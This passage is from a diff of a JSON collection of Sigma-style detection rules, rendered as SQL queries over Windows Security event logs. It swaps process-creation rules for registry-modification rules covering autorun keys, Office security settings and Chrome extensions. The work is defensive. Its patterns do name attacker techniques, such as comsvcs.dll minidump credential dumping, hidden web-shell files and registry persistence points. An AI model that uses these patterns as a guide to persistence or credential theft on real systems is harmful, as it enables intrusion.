'%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND NewValue LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_esentutl_webcache.yml" + "filename": "registry_set_persistence_scrobj_dll.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", - "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": 
"Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "status": "test", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE 
'%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' 
ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE 
'%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' 
ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "CurrentVersion NT Autorun Keys Modification", + "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND 
CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((NewValue = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR 
NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND NewValue LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification addition to the 'TypedPaths' key in the user 
or admin registry from a non standard application. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "title": "Disable Microsoft Office Security Features", + "id": "7c637634-c95d-4bbf-b26c-a82510874b34", "status": "test", - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", - "author": "Florian Roth (Nextron Systems)", + "description": "Disable Microsoft Office Security Features by registry", + "author": "frack113", "tags": [ 
"attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unknown yet" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_disable_microsoft_office_security_features.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Add DisallowRun Execution to Registry", + "id": "275641a5-a492-45e2-a817-7c81e9d9d3e9", + "status": "experimental", + "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND 
CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (NewProcessName LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR NewProcessName LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\DisallowRun' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_apt_hafnium.yml" + 
"filename": "registry_set_disallowrun_execution.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", - "status": "test", - "description": "Detects execution of javascript code using \"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Modify User Shell Folders Startup Value", + "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "status": "experimental", + "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.005" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" ], - "filename": "proc_creation_win_mshta_javascript.yml" + "filename": "registry_set_susp_user_shell_folders.yml" }, { - "title": "PsExec Pipes Artifacts", - "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", - "status": "test", - "description": "Detecting use PsExec via Pipe Creation/Access to pipes", - "author": "Nikita Nazarov, oscd.community", + "title": "CurrentVersion Autorun Keys Modification", + "id": "20f0ee37-5942-4e45-b7d5-c5b5db9df5cd", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, 
Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.execution", - "attack.t1569.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate Administrator activity" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ShellServiceObjectDelayLoad%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Run\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunOnceEx\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServices\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\RunServicesOnce\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\System\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Explorer\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Group Policy\\\\Scripts\\\\Logoff%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellServiceObjects%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellIconOverlayIdentifiers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Explorer\\\\ShellExecuteHooks%' ESCAPE '\\' OR 
